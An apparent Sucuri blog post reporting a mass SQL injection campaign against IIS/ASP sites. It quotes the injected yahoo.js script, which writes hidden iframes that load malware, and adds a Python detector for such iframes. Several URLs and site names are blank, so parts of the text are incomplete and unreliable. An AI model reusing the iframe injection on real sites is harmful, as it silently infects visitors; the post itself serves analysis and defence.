Mass infection of IIS/ASP sites –

A large number of sites have been hacked again in the last few hours with a malware script pointing to . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,””);document.write(“< iframe src= width=0 height==>
<iframe src= width=22 height=1

So it loads malware from, which then calls to load the virus. This is the output of our scan against

What is funny is that one of the top pages that got hacked was and their seminar about “Understanding SQL Server Security Options”. Just search on Google for “””” to see it.
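The yahoo.js script shown above uses document.write to add iframes with zero or one-pixel dimensions. As an added example (not Sucuri's scanner and not code from the original post), here is one way to sweep saved page or script content for that pattern. The function name, the 1-pixel threshold and the example.invalid URLs are assumptions, and the sample input is constructed.

```python
import re

# Opening iframe tag; tolerates "< iframe" spacing as seen in the script above.
IFRAME_RE = re.compile(r"<\s*iframe\b([^>]{0,500})>?", re.IGNORECASE)
# width=0, width="0", width=\"0\" (quotes may be escaped inside a JS string)
DIM_RE = re.compile(r"\b(width|height)\s*=\s*\\?[\"']?\s*(\d+)", re.IGNORECASE)
SRC_RE = re.compile(r"\bsrc\s*=\s*\\?[\"']?([^\s\"'\\>]+)", re.IGNORECASE)


def find_hidden_iframes(text, max_px=1):
    """Return iframes whose width or height is <= max_px (assumed threshold)."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = m.group(1)
        dims = {k.lower(): int(v) for k, v in DIM_RE.findall(attrs)}
        tiny = sorted(k for k, v in dims.items() if v <= max_px)
        if not tiny:
            continue  # normally sized iframe, e.g. an embedded map
        src = SRC_RE.search(attrs)
        line_start = text.rfind("\n", 0, m.start()) + 1
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "src": src.group(1) if src else None,
            "tiny_dims": tiny,
            # True when the tag sits inside a document.write call on the same line
            "via_document_write": "document.write" in text[line_start:m.start()],
        })
    return findings


# Constructed sample page: one legitimate iframe, two hidden ones.
SAMPLE = '''<html><body>
<h1>Seminar schedule</h1>
<iframe src="https://maps.example.invalid/embed" width="600" height="450"></iframe>
<script>try{__m}catch(e){__m=1;document.write("< iframe src=http://bad.example.invalid/a.htm width=0 height=0></iframe>");}</script>
<iframe src=http://bad.example.invalid/b.htm width=22 height=1></iframe>
</body></html>'''

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE):
        print(hit)
```

Because the injection lands in database fields, run the same check over exported text columns as well as rendered pages.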

If your site is hacked (or contains malware), and you need help, send us an email at or visit our site: Sucuri Security. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if they ever get infected with malware, hacked or blacklisted.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.
